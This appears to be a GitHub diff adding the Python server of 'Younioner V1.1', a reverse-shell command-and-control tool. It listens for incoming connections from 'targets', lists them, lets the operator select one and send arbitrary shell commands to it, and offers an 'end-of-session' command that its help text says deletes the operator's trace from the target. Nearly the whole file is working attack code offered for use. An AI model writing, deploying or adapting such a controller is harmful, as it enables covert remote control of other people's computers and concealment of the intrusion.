|
| 1 | +from socket import * |
| 2 | +import time |
| 3 | +import threading |
| 4 | +import sys |
| 5 | +import os |
| 6 | +from queue import Queue |
| 7 | + |
| 8 | +queue = Queue() |
| 9 | +host = '192.168.1.88' # your computer ip |
| 10 | +port = 4343 |
| 11 | + |
| 12 | + |
| 13 | +class Server: |
| 14 | + def __init__(self, _host, _port=3434, _max_client=20): |
| 15 | + |
| 16 | + # Variables used in this class are here |
| 17 | + self.host = _host |
| 18 | + self.port = _port |
| 19 | + self.max_client = _max_client # max amount of expected connections |
| 20 | + |
| 21 | + # once any client connected |
| 22 | + self.all_connection = [] # the connections will be stored here. |
| 23 | + self.all_addresses = [] # the addresses will be stored here. |
| 24 | + |
| 25 | + # create socket |
| 26 | + def open_socket(self): |
| 27 | + try: |
| 28 | + self.s = socket(AF_INET, SOCK_STREAM) |
| 29 | + self.s.bind((self.host, self.port)) |
| 30 | + |
| 31 | + logo = "__ __ _ ____ \n" \ |
| 32 | + "\ \ / /__ _ _ _ __ (_) ___ _ __ ___| _ \ \n" \ |
| 33 | + " \ V / _ \| | | | '_ \| |/ _ \| '_ \ / _ \ |_) | \n" \ |
| 34 | + " | | (_) | |_| | | | | | (_) | | | | __/ _ < \n" \ |
| 35 | + " |_|\___/ \__,_|_| |_|_|\___/|_| |_|\___|_| \_\ \n" |
| 36 | + |
| 37 | + print("\n\tWelcome to Younioner V1.1") |
| 38 | + print(logo) |
| 39 | + print('Created by Ayoub Ouakkaha, please visit our website www.ouakkaha.com') |
| 40 | + print( '\ncontact us at [email protected], type help to display available commands.') |
| 41 | + |
| 42 | + # listen for one connection :) |
| 43 | + self.s.listen(self.max_client) |
| 44 | + |
| 45 | + except error as e: |
| 46 | + print("** Oops Something went wrong error code ", e) |
| 47 | + time.sleep(5) # wait for 5s and try again |
| 48 | + self.open_socket() |
| 49 | + |
| 50 | + # accept incoming connection |
| 51 | + def accept_connection(self): |
| 52 | + for c in self.all_connection: # close the connection list |
| 53 | + c.close() |
| 54 | + del self.all_connection[:] # clean connection list |
| 55 | + del self.all_addresses[:] # clean addresses list |
| 56 | + |
| 57 | + while True: |
| 58 | + try: |
| 59 | + conn, address = self.s.accept() |
| 60 | + conn.setblocking(1) |
| 61 | + self.all_connection.append(conn) |
| 62 | + self.all_addresses.append(address) |
| 63 | + print("\n* new Connection has been established from {} on {}".format(address[0], address[1])) |
| 64 | + print("\nYounioner> ", end="") |
| 65 | + except error as e: |
| 66 | + print("something went wrong while accepting new connection\n error code: {} \n".format(str(e))) |
| 67 | + |
| 68 | + # Interactive shell for sending command remotely |
| 69 | + def start_younioner(self): |
| 70 | + |
| 71 | + while True: |
| 72 | + cmd = str(input("Younioner> ")) |
| 73 | + cmd = cmd.lower() |
| 74 | + cmd_stripped = cmd.strip() |
| 75 | + |
| 76 | + if cmd.strip() == 'list': |
| 77 | + self.list_connections() |
| 78 | + continue |
| 79 | + elif cmd.strip() == "help": |
| 80 | + self.displayHelp() |
| 81 | + |
| 82 | + elif cmd_stripped.startswith("select"): # check command start with `select` word |
| 83 | + conn = self.get_target(cmd) |
| 84 | + if conn is not None: |
| 85 | + self.send_commands(conn) |
| 86 | + elif cmd_stripped == "quit": |
| 87 | + self.exit() |
| 88 | + |
| 89 | + else: |
| 90 | + print("{} Command not recognized..".format(cmd)) |
| 91 | + |
| 92 | + # Display the help menu |
| 93 | + def displayHelp(self): |
| 94 | + """Display The help menu""" |
| 95 | + help = "\nthis section will help to understand the basic commands: " \ |
| 96 | + "\n\nlist............ It will list availabel connection..Usage(just type : `list`)"\ |
| 97 | + "\n\nselect.......... used to select a connection to target.. the target number needs be availabel on list section Usage(select 1) or change the number 1 to the target ID"\ |
| 98 | + "\n\nquit............ used to close the current connection .. or if you don't have one it will close the script"\ |
| 99 | + "\n\nhelp............ as you might guess, it will print the help Menu, which you're looking to now.:)"\ |
| 100 | + "\n\nend-of-session.. this is really advance command..this command will delet your trace from the target command, for example it will delet the current running script on the target command which is(Client) "\ |
| 101 | + "\n\nIf you liked Our app and you want to help us for providing more and more.. please contact us at [email protected] or visit my site www.ouakkaha.com\nanyway thanks for using my app, be sure to have a greate day :)" |
| 102 | + |
| 103 | + |
| 104 | + print(help) |
| 105 | + # Exit Reverse Shell |
| 106 | + def exit(self): |
| 107 | + for c in self.all_connection: |
| 108 | + try: |
| 109 | + c.send(str.encode("end-of-session")) |
| 110 | + c.shutdown(2) |
| 111 | + c.close() |
| 112 | + except Exception as e: |
| 113 | + print('Could not close connection ' + str(e)) |
| 114 | + |
| 115 | + self.s.close() |
| 116 | + print("\n Good By, please have a nice day :) ") |
| 117 | + |
| 118 | + # this will be over need but believe me, some times the module refuse to exit.. |
| 119 | + # this is why i try each of this method cause at the end one of theme should work.. |
| 120 | + os._exit(0) |
| 121 | + sys.exit() |
| 122 | + quit(0) |
| 123 | + exit(0) |
| 124 | + |
| 125 | + |
| 126 | + # this will display all current connection |
| 127 | + def list_connections(self): |
| 128 | + rs = '' |
| 129 | + for i, conn in enumerate(self.all_connection): # Enumerate will count number of loop |
| 130 | + try: # we will test if conn are working.. |
| 131 | + conn.send(str.encode(' ')) # send blank to test if conn is working., |
| 132 | + conn.recv(20240) |
| 133 | + except: # this will ocure if conn is null |
| 134 | + del self.all_connection[i] |
| 135 | + del self.all_addresses[i] |
| 136 | + continue # go to next loop do not execut the next line.. |
| 137 | + rs += str(i) + '\t' + str(self.all_addresses[i][0]) + '\t' + str(self.all_addresses[i][1]) + '\n' |
| 138 | + |
| 139 | + |
| 140 | + print("Currently Available Targets") |
| 141 | + print("ID\tIP\t\t\t\tPORT\n" + rs) |
| 142 | + |
| 143 | + # Select a target client |
| 144 | + def get_target(self, cmd): |
| 145 | + target = cmd.replace('select ', '') |
| 146 | + try: |
| 147 | + target = int(target) |
| 148 | + except: |
| 149 | + print("Target index should be integer.") |
| 150 | + return None |
| 151 | + try: |
| 152 | + conn = self.all_connection[target] |
| 153 | + except: |
| 154 | + print("Not Invalid Selection..") |
| 155 | + return None |
| 156 | + |
| 157 | + print("You are now connected to", self.all_addresses[target][0]) |
| 158 | + print("Younioner.{} >> ".format(self.all_addresses[target][0]), end="") |
| 159 | + return conn |
| 160 | + |
| 161 | + # Connect with the target |
| 162 | + def send_commands(self, conn): |
| 163 | + while True: |
| 164 | + try: |
| 165 | + cmd = str(input()) |
| 166 | + |
| 167 | + if len(cmd) > 0: |
| 168 | + conn.send(str.encode(cmd)) |
| 169 | + client_response = str(conn.recv(20480), "utf-8") |
| 170 | + print(client_response, end="") |
| 171 | + |
| 172 | + # confirm quit |
| 173 | + if cmd == "quit": |
| 174 | + print("\nAre you sure, the socket will be closed for this moment..") |
| 175 | + confirm = str.upper(input("\t N / y >> ")) |
| 176 | + if confirm == "Y": |
| 177 | + break |
| 178 | + |
| 179 | + except: |
| 180 | + print("[!] Connection was lost ") |
| 181 | + break |
| 182 | + |
| 183 | +# Setting up threads |
| 184 | +def setup_threads(): |
| 185 | + server = Server('', port) |
| 186 | + for _ in range(2): |
| 187 | + t = threading.Thread(target=work, args=(server,)) |
| 188 | + t.daemon = True # It means when the script got closed the thread also will exit from process |
| 189 | + t.start() |
| 190 | + return |
| 191 | + |
| 192 | + |
| 193 | +# Do the next job in the queue(1: handles connection, other sends commands and get response back) |
| 194 | +def work(server): |
| 195 | + while True: |
| 196 | + x = queue.get() |
| 197 | + if x == 0: # 0: handles connection |
| 198 | + server.open_socket() |
| 199 | + server.accept_connection() |
| 200 | + if x == 1: # 1: sends commands to target machine |
| 201 | + server.start_younioner() |
| 202 | + queue.task_done() # [Done] jobs are done with success |
| 203 | + return |
| 204 | + |
| 205 | + |
| 206 | +# Each list item is a new job |
| 207 | +def create_jobs(): |
| 208 | + for x in range(2): |
| 209 | + queue.put(x) |
| 210 | + queue.join() |
| 211 | + return |
| 212 | + |
| 213 | +# the main function |
| 214 | +def main(): |
| 215 | + setup_threads() |
| 216 | + create_jobs() |
| 217 | + |
| 218 | + |
| 219 | +if __name__ == '__main__': |
| 220 | + main() |
0 commit comments